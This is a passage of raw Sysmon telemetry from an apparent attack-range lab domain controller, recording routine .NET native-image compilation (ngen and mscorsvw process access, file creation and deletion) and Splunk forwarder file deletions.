21:03:37.628{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1A9-60D3-4903-00000000CF01}2612C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020183Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:37.597{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1A9-60D3-4903-00000000CF01}2612C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020182Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:37.597{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1A9-60D3-4903-00000000CF01}2612C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000020181Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:37.300{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1A9-60D3-4803-00000000CF01}5464C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000020180Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:37.268{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63CE6A59221F518B52543416808F6B8D,SHA256=7CA87F7355386DCF29889534B9956E657A5A5C304B063EA0E3496436AFC83EDA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020179Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:37.253{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1A9-60D3-4803-00000000CF01}5464C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020178Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:37.253{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1A9-60D3-4803-00000000CF01}5464C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000020177Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:37.206{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1A9-60D3-4703-00000000CF01}6252C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020176Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:37.190{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1A9-60D3-4703-00000000CF01}6252C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020175Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:37.190{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1A9-60D3-4703-00000000CF01}6252C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000020202Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:38.879{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1AA-60D3-4D03-00000000CF01}4584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020201Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:38.862{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1AA-60D3-4D03-00000000CF01}4584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020200Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:38.862{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1AA-60D3-4D03-00000000CF01}4584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000020199Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:38.784{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1AA-60D3-4C03-00000000CF01}5240C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020198Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:38.768{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1AA-60D3-4C03-00000000CF01}5240C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020197Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:38.768{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1AA-60D3-4C03-00000000CF01}5240C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000020196Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:38.706{4DB9351A-A1AA-60D3-4B03-00000000CF01}3780NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\ARAU4TET2A\Microsoft.Activities.Build.ni.dll.auxMD5=B6E470B62D8052BD786D531762D68CD3,SHA256=5B37AA355AB4EE027D87CB37BA89E80DCEE95C41E3926E96679ABD822FB0677B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020195Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:38.706{4DB9351A-A1AA-60D3-4B03-00000000CF01}3780NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\ARAU4TET2A\Microsoft.Activities.Build.ni.dllMD5=BD7BD1F4B94D5941F79BFA0D5721181C,SHA256=E66F8444FD8F5AD3F329F97F44E2E95C4181C057CB7C5A0EED0EBB6B6BE66F75,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000020194Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:03:38.690{4DB9351A-A1AA-60D3-4B03-00000000CF01}3780C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\ec4-0\Microsoft.Activities.Build.dll2021-06-23 21:03:38.690 10341000x800000000000000020193Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:38.581{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1AA-60D3-4B03-00000000CF01}3780C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020192Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:38.550{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1AA-60D3-4B03-00000000CF01}3780C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020191Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:38.550{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1AA-60D3-4B03-00000000CF01}3780C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020190Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:38.253{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1AA-60D3-4A03-00000000CF01}6868C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020189Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:38.237{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1AA-60D3-4A03-00000000CF01}6868C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020188Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:38.237{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1AA-60D3-4A03-00000000CF01}6868C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000020187Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:38.206{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0604735443D620686D3B4D713FEFDF9B,SHA256=016756F4FB948649C80F3C6A2C9D1164C2E9B981A82CCC6ACBDCC6A50875EE82,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000020186Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 